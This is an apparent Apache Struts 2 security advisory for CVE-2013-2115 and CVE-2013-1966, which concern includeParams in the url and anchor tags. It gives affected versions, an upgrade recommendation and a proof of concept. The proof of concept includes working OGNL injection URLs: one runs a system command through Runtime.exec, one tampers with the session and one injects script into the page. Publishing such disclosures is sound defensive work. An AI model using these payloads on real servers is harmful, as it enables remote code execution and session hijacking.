Versions Compared

Key

  • This line was added.
  • This line was removed.
  • Formatting was changed.

Summary


Excerpt

A vulnerability introduced by forcing parameter inclusion in the URL and Anchor Tag allows remote command execution, session access and manipulation and XSS attacks


Who should read this

All Struts 2 developers and users

Impact of vulnerability

Remote command execution, remote server context manipulation, injection of malicious client side code

Maximum security rating

Highly

Critical

Recommendation

Developers should immediately upgrade to Struts 2.3.14.2

Affected Software

Struts 2.0.0 - Struts 2.3.14.1

Reporter

Eric Kobrin and Douglas Rodrigues (Akamai), Coverity Security Research Laboratory, NSFOCUS Security Team

CVE Identifier

CVE-2013-2115, CVE-2013-1966

Problem

Both the s:url and s:a tag provide an includeParams attribute.

...

The issue was originally addressed by Struts 2.3.14.1 and Security Announcement S2-013. However, the solution introduced with 2.3.14.1 did not address all possible attack vectors, such that every version of Struts 2 before 2.3.14.2 is still vulnerable to such attacks.

Proof of concept

  1. Open HelloWorld.jsp present in the Struts Blank App and add to one of the url/a tag the following parameter:

    Code Block
     includeParams="all"
    

    Such that the line will be something look like this:

    Code Block
    xml
    xml
    <s:url id="url" action="HelloWorld" includeParams="all">
    


  2. Run struts2-blank app
  3. Open the following url, resulting in calc application opening on Windows (try ....exec('open%20.')} to open a Finder window on Mac OS):

    Code Block
    http://localhost:8080/struts2-blank/example/HelloWorld.action?aaa=1${%23_memberAccess[%22allowStaticMethodAccess%22]=true,@java.lang.Runtime@getRuntime().exec('calc')}


  4. Open the following url to modify session content:

    Code Block
    http://localhost:8080/struts2-blank/example/HelloWorld.action?aaa=1${%23session[%22hacked%22]='true'}


  5. Open the following url to print out session content and in combination with the previous example introduce arbitrary code into the resulting HTML output:

    Code Block
    http://localhost:8080/struts2-blank/example/HelloWorld.action?aaa=1${%23session[%22hacked%22]}


...